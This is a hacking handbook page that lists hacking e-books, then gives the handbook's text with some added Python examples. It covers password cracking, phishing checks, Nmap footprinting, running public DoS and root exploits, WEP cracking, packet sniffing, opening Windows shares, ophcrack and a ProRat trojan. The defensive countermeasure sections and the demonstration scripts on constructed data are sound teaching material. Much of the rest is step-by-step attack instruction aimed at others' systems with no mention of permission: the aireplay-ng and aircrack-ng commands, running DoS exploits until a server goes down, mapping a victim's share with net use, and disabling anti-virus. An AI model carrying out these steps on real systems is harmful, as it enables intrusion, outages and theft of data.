The Hacker's Underground Handbook free downloads

Read them and become a famous ethical hacker. Added 4 years ago. About the author: piyush bansal.

Attachments (45):

Advance Hacking Exposed Part 6
Backtrack Advance Hacking tutorials
Beginners Hackers and tutorials
Black Book of Viruses and Hacking
Certified Ethical Hacker Study Guide
Cross Site Scripting and Hacking Websites
Dangerous Google Hacking Database and Attacks
Ethical Hacking Complete E-book for Beginners
Ethical Hacking Value and Penetration testing
G-mail Advance Hacking Guides and Tutorials
Hack the System for beginners
Hack your Friend using Backtrack
Hacking attacks and Examples Test
Hacking Computer Systems and Tutorials
Hacking into Computer Systems
Hacking Website Database and owning systems
Network Hacking and Shadows Hacking Attacks
Penetration Testing With Backtrack 5
Reverse Engineering for Beginners

Social Engineering

To protect yourself from social engineering attacks like the one discussed in this chapter, you must learn to question the supposed caller or visitor before handing over anything. Be aware that some professional social engineers study the company before attacking, so they may already know the answers to routine verification questions; verify through a channel you control (call back on a known number) rather than relying on what the caller knows.

Better safe than sorry.

Shoulder Surfing

When you type in your password, make sure there is no one behind you trying to peek.

Dictionary Attacks

Dictionary attacks are very simple to prevent: do not use a password that is a dictionary word. Some people think that if they take a dictionary word and replace a few letters with numbers or symbols (p4ssw0rd instead of password) they are safe. They are not: cracking tools apply exactly those substitutions as mangling rules to every word in the list, so the substituted variant is tried almost as early as the plain word.

Brute-force Attacks

Brute-force attacks can be countered by using a long password drawn from a large character set (numbers, mixed case and odd symbols). Every extra character multiplies the number of combinations the attacker has to try, so the longer the password, the longer it takes to crack. As noted under dictionary attacks, a passphrase of several unrelated words is your best option: it is long enough to put brute force out of reach yet still easy to remember. Precomputed tables (rainbow tables) for long passwords likewise take a very long time and a great deal of storage to build, which is why they are only practical against short passwords or weak hash formats.
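The following script is an added example, not code from the handbook or its author. It shows both points above in working code: a tiny rule-based mangler in the spirit of cracking-tool rule files recovers "clever" leetspeak variants of dictionary words in milliseconds, and a keyspace comparison shows why a long lowercase passphrase beats a short complex password against brute force. The word list, the substitution rules, the target hashes (SHA-256 stands in for whatever the real system stores) and the 1e10 guesses-per-second rate are all constructed assumptions.

```python
"""Added example (not from the handbook): a tiny rule-based mangler in the
spirit of John the Ripper / hashcat rules, run over a constructed word list,
plus a keyspace comparison for brute force.  Word list, rules, targets and
the guessing rate are all assumptions made for this demonstration."""
import hashlib
import itertools
import math

# Constructed word list; a real attack uses a file with millions of words.
WORDLIST = ["password", "dragon", "monkey", "letmein", "summer"]

# Substitutions that "clever" users make and that rule files try automatically.
LEET = {"a": "4", "e": "3", "i": "1", "o": "0", "s": "$", "t": "7"}
SUFFIXES = ["", "1", "123", "!", "2024"]


def mangle(word):
    """Yield candidates derived from one word: every subset of leet
    substitutions, plain and capitalised, with each common suffix."""
    positions = [i for i, c in enumerate(word) if c in LEET]
    for k in range(len(positions) + 1):
        for subset in itertools.combinations(positions, k):
            sub = "".join(LEET[c] if i in subset else c for i, c in enumerate(word))
            for base in (sub, sub.capitalize()):
                for suffix in SUFFIXES:
                    yield base + suffix


def sha256_hex(text):
    """Stand-in for whatever hash the target system stores (assumption)."""
    return hashlib.sha256(text.encode()).hexdigest()


def dictionary_attack(target_hashes, wordlist=WORDLIST):
    """Return {hash: password} for every target a mangled word reproduces."""
    cracked = {}
    for word in wordlist:
        for candidate in mangle(word):
            digest = sha256_hex(candidate)
            if digest in target_hashes:
                cracked[digest] = candidate
    return cracked


def brute_force_keyspace(length, alphabet_size):
    """Guesses needed to exhaust all passwords of this length and alphabet."""
    return alphabet_size ** length


def worst_case_years(keyspace, guesses_per_second):
    """Worst-case brute-force time in years at the given rate."""
    return keyspace / guesses_per_second / (3600 * 24 * 365)


if __name__ == "__main__":
    # Constructed "stolen" hashes of passwords their owners thought were clever.
    targets = {sha256_hex(p): p for p in ["P4ssw0rd123", "dr4gon!", "M0nkey"]}
    for digest, password in dictionary_attack(set(targets)).items():
        print(f"cracked {digest[:12]}... -> {password}")
    rate = 1e10  # assumed GPU rate in guesses per second
    for label, n, a in [("8 chars, 95-symbol alphabet", 8, 95),
                        ("20 chars, lowercase only", 20, 26)]:
        ks = brute_force_keyspace(n, a)
        print(f"{label}: 2^{math.log2(ks):.0f} guesses, "
              f"{worst_case_years(ks, rate):.2e} years worst case")
```

The mangler tries every subset of substitutions, so "P4ssw0rd123" falls out of the word "password" after a few hundred guesses, while the 20-character lowercase passphrase has a keyspace around 2^94 and never enters the list at all.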

Phishing

Phishing attacks are very simple to avoid. Whenever you are asked to enter personal information into a website, look at the URL bar before you type anything. If, for example, you are supposed to be on Gmail, then on the real Gmail website the URL should begin with www. (the example address is cut off in this copy). Check the registrable domain of the host, not just the beginning of the address: www.gmail.com.account-help.example is not Gmail, and neither is a look-alike with one letter swapped. Expect https as well, but remember that a phisher can get a valid certificate for his own domain, so the lock icon by itself proves nothing about who owns the site.

Footprinting

Footprinting is the first step hackers take in their process, because to hack a system the attacker must first learn everything there is to know about it. Below are examples of the steps and services a hacker would use to gather information on a website. First, the hacker would harvest information from the target's own website, looking in particular for e-mail addresses and names.
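The phishing check described above, done programmatically, as an added example that is not part of the handbook: it compares the registrable domain of the URL's host against the expected one instead of looking at how the address begins, insists on https, and flags punycode labels that are often used for look-alike names. The expected domain and the sample addresses are constructed for the demonstration.

```python
"""Added example (not from the handbook): the phishing URL check from the
text done programmatically.  Expected domain and sample URLs are constructed."""
from urllib.parse import urlsplit


def check_url(url, expected_domain, require_https=True):
    """Return (True, 'ok') if url really points at expected_domain,
    otherwise (False, reason).  Compares the registrable domain, not the
    beginning of the address, so look-alike prefixes do not pass."""
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".")   # .hostname is already lower-case
    expected = expected_domain.lower().rstrip(".")
    if not host:
        return False, "URL has no host"
    if require_https and parts.scheme != "https":
        return False, f"scheme is {parts.scheme!r}, not https"
    if any(label.startswith("xn--") for label in host.split(".")):
        return False, "punycode label in host: possible look-alike domain"
    if host != expected and not host.endswith("." + expected):
        return False, f"host {host!r} is not {expected!r} or a subdomain of it"
    return True, "ok"


# Constructed sample addresses a user might be sent to.
SAMPLE_URLS = [
    "https://mail.google.com/mail/u/0/",
    "http://mail.google.com/mail/",                          # no TLS
    "https://www.google.com.account-verify.example/login",   # real name, wrong domain
    "https://www.google.com@login.example/",                 # userinfo trick
    "https://gooogle.com/accounts",                          # typo-squat
    "https://xn--ggle-55da.com/",                            # IDN look-alike
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        ok, reason = check_url(u, "google.com")
        print(f"{'PASS' if ok else 'FAIL':4} {u}  ({reason})")
```

Only the first sample passes. The userinfo case is worth noting: everything before the @ is a username, so the browser goes to login.example even though the address starts with www.google.com.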

This information comes in handy if the hacker plans a social engineering attack against the company. Next the hacker would find the IP address of the website (a DNS lookup of the hostname). Then he would ping the server to see if it is up: if the echo replies come back, the server is up, though a host that filters ICMP looks down to ping while still serving on its open ports. Next the hacker would do a Whois lookup on the company's domain, which gives a huge amount of information about the company.

You see the company's e-mail addresses, postal address, contact names, when the domain was created, when it expires, its name servers and more (for most domains today the registrant contact details are redacted for privacy, but the dates and name servers remain). A hacker can also turn search engines on the target: the site: operator restricts results to one domain, and adding a specific word after it, such as the company's mail domain, narrows the results down to pages that publish e-mail addresses.

Now that the basics of footprinting have been explained, we will move on to port scanning. Once a hacker knows which services are listening on your server, he can look up known vulnerabilities in each of them and exploit one to take control of the host.

In the port scanning example we will use the most popular port scanner, Nmap; Zenmap is its graphical front end, and the two take the same options. First the hacker would choose a target and place it in the target box (in the command-line version the target is simply the last argument on the nmap command line). A smart hacker would go with a quick and quiet scan: a plain SYN scan (nmap -sS) touches each port once, whereas full version detection (-sV) completes connections and sends service probes, which is very loud and may raise suspicion on the other end. Stay away from those options at this stage, because as you will see later there are quieter ways to get the same information.

A sample scan result lists each open port with the service name Nmap guesses for it from its well-known port table; note that this is a table lookup, not proof of what is actually running there.

Along with finding the open ports, the hacker needs to find out what operating system the server is running, since there are always plenty of operating-system vulnerabilities to choose from. Nmap has an option to detect the operating system (-O), but this scan is noisy and easily detected, so it is better to avoid it if possible.

A simpler way to learn what the server is running is to request a page that does not exist and look at the error page. Many default error pages include a server signature naming the web server software and version, and sometimes the operating system it was built for; the same string is usually present in the Server response header. Now that the hacker has the list of open ports and services, he needs the exact software versions behind them.

Version Discovery

One way the hacker can get this information is to telnet to the service port and read its banner. On a Mac you would use Terminal. Note: on Windows Vista (and later) the Telnet Client is not installed by default; it is an optional feature you enable under Control Panel, Programs and Features, Turn Windows features on or off, after which the telnet command is available. First, the hacker would choose one of the open ports revealed by the Nmap scan to continue with and attempt to exploit.

As the chart above shows, port 21 is FTP. To find out what FTP software is running, he would connect to it with telnet (the example command is truncated in this copy: telnet www.). The example was run against localhost, so a hacker would insert the target's hostname in its place, followed by the port number.

On connecting, the target displays a banner naming the software and its version, as shown below. This is the information the hacker needs to begin searching for vulnerabilities in that software. Be aware that banners can be edited or removed by the administrator, so a banner is a strong hint rather than proof.

Searching for Vulnerabilities

Now that the hacker has the name of the software and its version number, he takes that information to a couple of vulnerability databases and looks for a public exploit. If a skilful and determined hacker finds nothing public, he may try to locate a vulnerability in the current version himself and develop an exploit for it.
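The two steps just described, the port scan and the telnet banner grab, as one added example in plain Python sockets (not code from the handbook, and not Nmap or telnet). It runs entirely against throw-away listeners on 127.0.0.1 that stand in for the target's services: one that announces an FTP-style banner, one that is open but silent, and one port that is closed. The banner text and port set are constructed.

```python
"""Added example (not from the handbook): a TCP connect scan and banner
grab in plain Python sockets against throw-away listeners on 127.0.0.1.
The listeners, their banners and the port set are constructed stand-ins
for the target's services; nothing here is Nmap or telnet."""
import socket
import threading


def start_banner_server(banner):
    """Start a listener on an ephemeral localhost port that sends `banner`
    to every client and hangs up.  Returns (port, stop_callable)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(0.2)
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            with conn:
                try:
                    if banner:
                        conn.sendall(banner)
                except OSError:
                    pass          # client already gone (e.g. a bare connect scan)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], stop.set


def find_closed_port():
    """Grab an ephemeral port and release it so it is (almost surely) closed."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def connect_scan(host, ports, timeout=0.5):
    """Connect scan: a completed three-way handshake means the port is open.
    Noisier than a SYN scan (the service logs a connection) but needs no
    raw sockets.  Returns the sorted list of open ports."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return sorted(open_ports)


def grab_banner(host, port, timeout=1.0):
    """Connect and return whatever the service says first, like telnet does.
    Returns '' for a service that stays silent or hangs up immediately."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))
        try:
            data = s.recv(1024)
        except socket.timeout:
            return ""
    return data.decode("utf-8", "replace").strip()


def scan_and_grab(host, ports):
    """Full workflow: scan, then banner-grab each open port. Returns {port: banner}."""
    return {p: grab_banner(host, p) for p in connect_scan(host, ports)}


if __name__ == "__main__":
    ftp_port, stop_ftp = start_banner_server(b"220 (ExampleFTPd 1.0.2)\r\n")
    quiet_port, stop_quiet = start_banner_server(b"")      # open, says nothing
    results = scan_and_grab("127.0.0.1", [ftp_port, quiet_port, find_closed_port()])
    for port, banner in results.items():
        print(f"{port}/tcp open  banner={banner!r}")
    stop_ftp()
    stop_quiet()
```

The silent listener is the realistic case the text hints at: many services (HTTP among them) say nothing until you speak first, so a banner grab has to send a protocol-appropriate probe, which is exactly what makes Nmap's version detection loud.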

You might be wondering why 0-days are worth so much. A 0-day is a vulnerability for which no patch exists yet, so an exploit for it works against every fully updated system until the vendor fixes it; that window is what buyers pay for. Two common classes of exploit are:

Denial-of-Service (DoS). There are many types of DoS attack, but they all have one purpose: to make the target server unavailable to legitimate users. The most common kind floods the server with traffic until it exhausts its resources (bandwidth, connections, CPU or memory), pushing it offline or making it refuse legitimate requests.

Buffer Overflow (BoF). A buffer overflow happens when a program writes more data into a buffer (a fixed-size area of memory) than it was meant to hold. Because the buffer has a fixed size, the excess overwrites whatever is adjacent in memory: other variables, a saved return address or a function pointer. If the attacker controls the excess, he can redirect execution to code of his own choosing.

Once that code is executed, the hacker can gain full control of the server. Exploits are also classified by where they run. Below are their definitions:

Local Exploit. To run a local exploit you must already have access and some privileges on the machine. Local exploits are usually used to escalate privileges to admin or root; in other words, they let an ordinary user become root.

Remote Exploit. A remote exploit is launched over the network against a listening service and requires no prior access to the target system.

A hacker usually has to use a combination of remote and local exploits to gain full control of a system. For example, a remote exploit may give him only the privileges of the service he attacked; a local exploit then escalates him to root.

Penetrating

So now you might be wondering: once the hacker finds the right exploit, how does he run it against the target and penetrate the server? This chapter explains that. As you browse Milw0rm or the other exploit databases listed in this chapter (Milw0rm has since closed; its archive and new submissions live on at Exploit-DB), you will notice that exploits are written in many different programming languages.

Below I list a few of the most common languages used, and how a hacker would compile and run an exploit written in each against a server.

PHP

First the hacker needs PHP installed on his own computer. Every exploit is different: some you have to know what to edit, and some carry run-time instructions in their header comments, so read the whole script before running it. Next, open a command prompt (or Terminal on a Mac) and change into the PHP directory with the cd (change directory) command followed by the directory path.

On the first run you will probably get a couple of errors. The above is a simple example; every now and then you will also see errors like the one in the second picture above, which come from the server's PHP configuration rather than from the script. As a hacker you have to learn a lot on your own: going around asking simple questions like this all the time makes you look bad, and the most common response you will receive is: www. Google is your friend, so take advantage of it!

So starting now, use Google first, and if you are still stuck, ask for help on community forums. Once the errors are fixed and the program is running, the DoS attack runs against the target website until you close the command window; eventually the server may go down completely.

Perl

Download and install the appropriate version of ActivePerl. Next the hacker would find an exploit for the vulnerability.

This is also a Denial of Service (DoS) exploit. Edit the options, such as the target server, as needed, then run it; the attack has begun.

Python

Python is also a common language for writing exploits, and running a Python exploit is just as easy as running a Perl one. Hint: Python files end with .py. The interpreter version and any modules the script needs are usually noted in comments at the top of the script, so read them before running it.

C/C++

Exploits written in C or C++ have to be compiled first. Below is a list of the most popular compilers for each operating system. Cygwin is a Linux-like environment for Windows that provides a POSIX emulation layer, so Linux tools and scripts can be built and run on Windows.

On Ubuntu, open a Terminal and create the source file with vi: open the file, press i to enter insert mode, right-click and paste in the exploit, press Esc, then type :wq to write the file as exploit.c and quit. Type ls to list the files in the current directory; you should see your newly made file.

Next install the compiler with apt-get (sudo apt-get install build-essential); it downloads the packages and asks whether you would like to continue before installing them. If no error is displayed, it was successful. Compile the exploit (gcc exploit.c -o exploit) and run it with no arguments; most exploits then print a short note telling you how to run them against a server.

The image below shows all of these steps together; its last line shows the proper way a hacker would use the compiled exploit against a server. Below that is an image of what the root account on Ubuntu looks like; in this case I am root.

On Windows, run the Cygwin installer, choose to install from the internet, and continue until it asks you to choose a mirror; any will do. Next you must select the packages to download: expand the window so you can see all of the columns and pick the gcc compiler package. It will begin to install the packages. Once installed, double-click the desktop icon and a command prompt comes up; compile and run the exploit the same way, and it displays its run-time directions.

Put in the right options and parameters and run it again. The picture below shows all of these steps being done. When a hacker runs such an exploit against a vulnerable machine and it works, he has root access to the target. Many exploits are created and tested in a specific environment, and the expected outcome only happens when the exploit runs in exactly that environment (same software version, same build options, same system libraries).

That is another reason programming knowledge is needed: so you can edit an exploit to work in your target's environment. Once a skilled hacker gains root on a server, he can do a great deal of damage.

Countermeasures

There are a few things you can do to stay secure against network hacking attempts:

Keep all your software up to date. New vulnerabilities will keep appearing, and it is your responsibility to apply each patch promptly after it is released.

Implement a firewall and expose only the ports you actually need; every service reachable from the internet is a target for the scan described above.

Install anti-virus software.

Scan your own system with a vulnerability scanner. This may reveal vulnerabilities before an attacker finds them.

Turn off services you do not use, and where the software allows it, avoid advertising exact version numbers in banners and error pages.

Wireless Hacking

You can get internet access with a wireless-enabled laptop almost everywhere you go. In this chapter I will discuss how a hacker goes about getting into secured wireless networks and what he can do once inside. The hacker starts by scanning for wireless networks near him. The Windows tool we will use in this section is NetStumbler; by the time you receive this eBook, MacStumbler may already be released for those of you using a Mac.

Download and install NetStumbler and run it. It automatically starts scanning for wireless access points, and once finished it shows a list of all the access points around you; the more green and the fewer gaps in the signal bar, the better the signal. For each network it shows the MAC address, channel number, encryption type and much more. All of these come in useful when a hacker decides to get into a secured network by cracking its encryption.

Cracking WEP

Backtrack comes with a huge list of preloaded software for this very purpose. Before we begin, there are a couple of requirements: you need a computer with a compatible wireless adapter (one whose driver supports monitor mode and packet injection), and you need to download Backtrack and create a Live CD.

First we will find a wireless access point along with its BSSID, ESSID and channel number. To do this we run Kismet by opening a terminal and typing kismet. It may ask for the appropriate adapter, which in my case is ath0. For the later steps your wireless adapter must be in monitor mode; Kismet puts it there automatically, and as long as Kismet stays open the adapter stays in monitor mode.

In Kismet's list, the letter in the encryption column stands for the type of encryption in use. In our case we are looking for access points using WEP. Once you find one, open a text document and paste in the network's broadcast name (ESSID), its MAC address (BSSID) and its channel number. The next step is to start collecting data from the access point with airodump.

Open a new terminal and start airodump by typing:

airodump-ng -c [channel] -w [filename] --bssid [bssid] [device]

Here airodump-ng starts the program, the channel of your access point follows -c, the file you want the captured data written to follows -w, the MAC address of the access point follows --bssid, and the command ends with the device name. Leave out the brackets. Leave this running and open another terminal.

Next we generate some fake packets to the target access point so that the rate of captured data increases. Enter:

aireplay-ng -1 0 -a [bssid] -h [your mac] -e [essid] [device]

Here we are using the aireplay-ng program. The -1 selects the attack we want, in this case fake authentication with the access point. The 0 is the delay between attempts, -a is the MAC address of the target access point, -h is your wireless adapter's MAC address, -e is the name (ESSID) of the target access point, and the command ends with your wireless adapter's device name.

Now we force the target access point to send out a huge number of packets that we can use to crack the WEP key. The command itself is missing from this copy; the attack it describes is aireplay-ng's ARP request replay (aireplay-ng -3 -b [bssid] -h [your mac] [device]), which captures an ARP request and replays it so the access point answers with a freshly encrypted packet, and a fresh IV, every time. Once it is running, check your airodump-ng terminal and you should see the data (IV) count start to climb.

Once you have collected around 50,000 packets you may begin the attempt to break the WEP key. The command to start cracking is:

aircrack-ng -a 1 -b [bssid] [filename]-01.cap

where -a 1 selects WEP cracking and the capture file is the one airodump-ng wrote (it appends -01 to the name you gave it). This should recover the WEP key within seconds to minutes; the more packets you capture, the better your chance. With all the different computers and network adapters out there, you may occasionally come across an error.

If you get stuck, remember, Google is your friend!

Packet Sniffing

Packet sniffing is the act of capturing packets going through a network. With a packet sniffer, once a hacker has access to a wireless network he can intercept private information going through it, such as usernames, passwords, IM conversations and e-mails, whenever those are sent unencrypted. Download and install Wireshark, launch it, and click the option to list the available capture interfaces as shown below. Next choose the interface to capture on and click Start.

A high rate of captured packets shows that the user is currently active. To show how Wireshark can be used, I will start Windows Live Messenger and send a message. As you will see in the image below, my whole conversation is captured: my message is displayed at the bottom, and if I continue down the list I can see the whole conversation.

Countermeasures

Change your router's default password and make sure WPA encryption (WPA2 or newer) is enabled; WEP, as shown above, is broken and should only be a last resort, and even then it is only marginally better than nothing. Use a long, secure passphrase for the network and for the router's admin page, with numbers, lowercase and uppercase letters and other symbols. Disable SSID broadcasting on your router; this hides the network from casual tools like NetStumbler, though a passive sniffer such as Kismet still sees it as soon as a client connects. Use MAC filtering: every wireless card has a MAC address, and allowing only yours keeps casual attackers out, but since MAC addresses are visible in the air and trivially spoofed, treat this as a speed bump rather than a lock.

To protect yourself against packet sniffing, make sure the important sites you use, such as banks, use SSL/TLS (https), so that your traffic is encrypted end to end even on a network the attacker can sniff.

Network Sharing Attacks

This attack requires only that the target machine has file and printer sharing enabled and the sharing port open (the port number is missing from this copy; Windows file sharing uses the NetBIOS session service on TCP 139 and SMB on TCP 445). First the hacker would search for a target. A common tool is Angry IP Scanner: download and install it, then enter the IP range you would like to scan.
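The packet sniffing section above says a hacker can lift usernames and passwords out of captured traffic; the following added example (not code from the handbook) shows concretely what that looks like once the packets are in hand, and why the TLS advice matters. It runs a small credential extractor over constructed TCP payloads: an FTP login split across two segments, an HTTP request with Basic authentication, a login form POST, and the start of a TLS ClientHello, which yields nothing because the session is encrypted. The payloads, hostnames and credentials are all constructed.

```python
"""Added example (not from the handbook): what a sniffer on an open network
can pull out of unencrypted traffic.  The payloads below are constructed
TCP segments, not a real capture; the TLS record at the end shows what an
encrypted session looks like to the same code."""
import base64
from urllib.parse import parse_qs

HTTP_METHODS = ("GET ", "POST ", "PUT ", "HEAD ")
USER_FIELDS = ("username", "user", "login", "email", "uid")

SAMPLE_PAYLOADS = [
    b"USER alice\r\n",                                    # FTP login, two segments
    b"PASS hunter2\r\n",
    b"GET /admin HTTP/1.1\r\nHost: intranet.example\r\n"
    b"Authorization: Basic " + base64.b64encode(b"bob:secret123") + b"\r\n\r\n",
    b"POST /login HTTP/1.1\r\nHost: shop.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 31\r\n\r\n"
    b"username=carol&password=letmein",
    b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03" + b"\x00" * 32,  # TLS ClientHello start
]


def extract_credentials(payload):
    """Return (protocol, user, secret) tuples visible in one TCP payload.
    FTP/POP3-style USER and PASS arrive in separate segments, so one of the
    two fields is None; harvest() pairs them up."""
    found = []
    text = payload.decode("latin-1")
    for line in text.split("\r\n"):
        upper = line.upper()
        if upper.startswith("USER "):
            found.append(("ftp", line[5:].strip(), None))
        elif upper.startswith("PASS "):
            found.append(("ftp", None, line[5:].strip()))
    if text.startswith(HTTP_METHODS):
        head, _, body = text.partition("\r\n\r\n")
        for line in head.split("\r\n")[1:]:
            name, _, value = line.partition(":")
            value = value.strip()
            if name.strip().lower() == "authorization" and value.lower().startswith("basic "):
                try:
                    user, _, pw = base64.b64decode(value[6:]).decode("latin-1").partition(":")
                except ValueError:
                    continue
                found.append(("http-basic", user, pw))
        if body:
            fields = {k.lower(): v[0] for k, v in parse_qs(body).items()}
            user = next((fields[k] for k in USER_FIELDS if k in fields), None)
            secret = next((v for k, v in fields.items() if "pass" in k), None)
            if secret is not None:
                found.append(("http-form", user, secret))
    return found


def harvest(payloads):
    """Run extract_credentials over payloads in capture order and pair each
    USER with the PASS that follows it.  Returns (protocol, user, secret)."""
    results, pending_user = [], None
    for payload in payloads:
        for proto, user, secret in extract_credentials(payload):
            if proto != "ftp":
                results.append((proto, user, secret))
            elif user is not None:
                pending_user = user
            elif pending_user is not None:
                results.append(("ftp", pending_user, secret))
                pending_user = None
    return results


if __name__ == "__main__":
    for proto, user, secret in harvest(SAMPLE_PAYLOADS):
        print(f"{proto:10} user={user!r} secret={secret!r}")
```

Basic authentication is only base64, not encryption, which is why it decodes here as easily as the plain-text form POST; only the TLS segment keeps its secrets.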

Click the downward arrow on the right and check the Scan ports box. A pop-up asks whether you would like to select a new port; click Yes, type the port number into the first box and click OK, then click Start.

In the example, every IP in the range was scanned; only one host was alive, and luckily it had the sharing port open. Without that, this attack is not possible.

An open sharing port means file and printer sharing is enabled. The net view command (net view \\[target ip]) lists any shared drives, folders, files or printers. In my case I got the following: two printers shared and one disk named SharedDocs. The hacker would be able to take control of my printers and view everything in my SharedDocs share. To gain access to SharedDocs, the hacker maps the share as a drive on his own computer with net use (net use G: \\[target ip]\SharedDocs).

If successful, the hacker has all the contents of my share on his computer. The drive letter in the command just tells your computer what to name the mapped drive; it looks like I already have a drive G, so the command fails. To fix this, open My Computer, which shows all your current drives, and change the letter G to one that is not in use. Once the command completes successfully, go to My Computer and you should see the new drive under Network Drives; double-clicking it brings up all of the target's documents. Note that this only works when the share allows unauthenticated guest access; newer Windows versions refuse guest access to shares by default, and the Windows firewall blocks these ports on public networks.

Cracking Windows Passwords

Ophcrack is a Windows-only password cracker that uses rainbow tables to get the job done quickly. Windows stores a couple of types of password hash. One of them is the LM (LAN Manager) hash.

To compute an LM hash, the password is truncated or null-padded to 14 characters, converted to all uppercase, and split into two 7-character halves; each half is used as a DES key to encrypt a fixed constant, and the two 8-byte results are concatenated. Because the halves are hashed independently and case is discarded, an attacker never has to search more than the space of 7-character uppercase strings at a time, and each half of the hash can be cracked separately; a password of 7 characters or fewer even shows up as a recognisable constant in the second half. That is why the LM hash falls to rainbow tables in minutes and why it is a serious weakness wherever it is still stored. So you might be wondering, how can I get a copy of those hashes? There are a couple of ways.

First download and install ophcrack. There are two versions; in this example we will be using the program itself in Windows, so download the first option. Once it has downloaded, install it; when the option comes up to download rainbow tables, untick them all and just install the program.

It is better to download the rainbow tables separately. Once installed, go to the ophcrack website and click Tables in the navigation; this lists all the tables you can download. As you can see, the more characters a table covers, the bigger it gets. Choose the correct table for your operating system; in the example I chose the largest free table. Next run ophcrack and click Tables.

Select the table you downloaded and click Install to locate the file on your computer, then OK to continue. Make sure your anti-virus and anti-spyware programs are disabled, because most of them flag PWDUMP as malicious since it reads the SAM system files. This loads the password hashes for all users on your computer and displays them.

Next click Crack and the program begins cracking the hashes. The second way is the LiveCD: go to the ophcrack website and choose the LiveCD for the correct operating system, burn the downloaded image to a disc and boot the target from it. If the graphical mode fails to start, go into Ophcrack Text mode. Once ophcrack loads completely, it automatically gets your Windows password hashes and begins the cracking process.
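The structure of the LM hash described above can be read straight off a dump before any cracking starts. The following added example (not code from the handbook) triages pwdump-style output: it spots accounts whose LM hash is absent, accounts whose password is 7 characters or shorter (second half equal to the empty-half constant), accounts that need two independent 7-character searches, and empty passwords, and it computes how much smaller the LM search is than a real 14-character search. The dump lines and their hash values are constructed; only the two well-known empty-password constants are real.

```python
"""Added example (not from the handbook): triage a pwdump-style hash dump
for the LM weakness described above.  The dump lines are constructed; only
the two well-known constants (LM and NT hashes of the empty password) are real."""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty/absent password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
EMPTY_LM_HALF = EMPTY_LM[:16]                    # one 7-char half that was all padding

# Constructed pwdump output: user:RID:LM hash:NT hash:::  (hash values are arbitrary hex)
SAMPLE_PWDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
alice:1001:1a2b3c4d5e6f70819a2b3c4d5e6f7081:a0b1c2d3e4f5061728394a5b6c7d8e9f:::
bob:1002:9f8e7d6c5b4a3928aad3b435b51404ee:f0e1d2c3b4a5968778695a4b3c2d1e0f:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
this line is not a pwdump record
"""


def parse_pwdump(text):
    """Parse user:rid:lm:nt::: lines into dicts, skipping anything malformed."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        records.append({"user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt})
    return records


def assess(record):
    """Work out what the LM hash gives away and which attack applies."""
    lm, nt = record["lm"], record["nt"]
    lm_present = lm != EMPTY_LM
    if not lm_present:
        max_len, advice = None, "LM disabled or password longer than 14: attack the NT hash"
    elif lm[16:] == EMPTY_LM_HALF:
        max_len, advice = 7, "password is 7 chars or fewer: crack a single 7-char uppercase half"
    else:
        max_len, advice = 14, "password is 8-14 chars: crack the two 7-char halves independently"
    return {"rid": record["rid"], "lm_present": lm_present, "max_len": max_len,
            "empty_password": nt == EMPTY_NT, "advice": advice}


def analyze_pwdump(text):
    """Return {username: assessment} for every valid record in the dump."""
    return {r["user"]: assess(r) for r in parse_pwdump(text)}


def lm_search_reduction():
    """How much smaller the LM search is than a real 14-char search: two
    independent 7-char halves over the 69 printable characters left after
    uppercasing, versus 95^14 for a case-sensitive 14-char password."""
    return 95 ** 14 / (2 * 69 ** 7)


if __name__ == "__main__":
    for user, a in analyze_pwdump(SAMPLE_PWDUMP).items():
        print(f"{user:14} rid={a['rid']:<4} empty={a['empty_password']!s:5} {a['advice']}")
    print(f"LM makes the search about {lm_search_reduction():.1e} times smaller")
```

The Administrator line is what a hardened system should look like: LM storage disabled, so only the NT hash is available to the attacker. Anywhere else the LM column gives away the password length class before a single guess is made.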

Malware

Every day thousands of people are infected by different types of malware. The most common types today are viruses, worms and Trojans. In this chapter we will discuss the types of malware and show an example of a Windows Trojan in use. We use Windows because, at the time this was written, malware for Linux and Mac computers was comparatively rare (it no longer is, so the countermeasures below apply to every platform).

Definitions

Viruses. Viruses cannot spread without human help. They are like parasites: they need a host to attach to, usually a legitimate-looking program or file. Once that program is launched, the virus executes and infects other files on your computer. Viruses can be very destructive, damaging your software and files and, in rare cases, firmware or hardware. They spread through shared files and are often sent as e-mail attachments.

Worms. A worm is a malicious program that replicates itself onto other computers across a network without any user action. Once it infects a system, it uses that system to send copies of itself to other random systems and tries to infect them too.

Trojan Horse. A Trojan horse is a malicious program disguised as something the user wants. It can be used for silly things like changing the desktop, messing with the user interface or taking control of your mouse, and for serious things like accessing your data, erasing your files, stealing your passwords and capturing your keystrokes.

Logic Bombs. Logic bombs are pieces of code planted in a program that lie dormant until a certain time, or until a user performs a certain action, which triggers them.

Bacteria. Bacteria (also called rabbits, of which the fork bomb is the classic example) make many copies of themselves and eventually consume all of the computer's resources: processor time, memory and disk space. The legitimate user loses access to those resources.

Blended Threats. Blended threats combine the characteristics of all of the above and use them together with system vulnerabilities to spread and infect machines.

ProRat

Download ProRat.

